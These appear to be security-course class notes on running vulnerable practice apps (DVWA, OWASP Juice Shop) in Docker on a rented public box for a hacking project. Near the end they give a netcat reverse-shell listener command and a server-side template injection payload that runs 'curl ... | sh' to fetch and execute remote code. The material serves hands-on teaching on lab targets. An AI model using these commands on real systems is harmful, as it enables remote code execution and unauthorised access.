Don't like this style? Click here to change it! blue.css
OK goal for today:
This is a nice follow-up to the reverse shell goal from last class, as you need a box with a public IP and a port you can control. I also think it's nice for Thanksgiving week, so you've got a nice wide set of vulnerabilities to hack with for Project 2.
OK spinning up a box and paying for the number of minutes it stays on.
So the version of dockering we want to do here is quickly getting someone else's backend running.
Generally the stages of running docker look roughly like this:
bash)Then there are online distributions of docker images that you can publish to or shop from.
Shop around at https://hub.docker.com/
Run the docker service: service docker start
Open up particular ports: ufw enable ufw allow 8080 ufw allow 3000 if anything goes wrong look for guides
OK these vulnerable webapps are available to us so let's run them:
Run DVWA docker run --rm -it -p 8080:80 vulnerables/web-dvwa visit YOURIP:8080
Run OWASP Juice Box docker run --rm -it -p 3000:3000 bkimminich/juice-shop visit YOURIP:3000
You can probably find publically hosted versions of these things too, but that's not as useful to your growth.
File Upload Exploits, Command Injection, SQL injection, bad credentials, etc etc etc
You can also setup a reverse shell listener on your box while you have it running.
ufw allow 9977nc -lvnp 9977For our SSTI problem from last class the solution we (JD and I) eventually found was to curl one of these payloads in:
https://general-immediate-fish.glitch.me/=process.mainModule.require('child_process').exec('curl%20is.am%2FIDHERE%20%7C%20sh')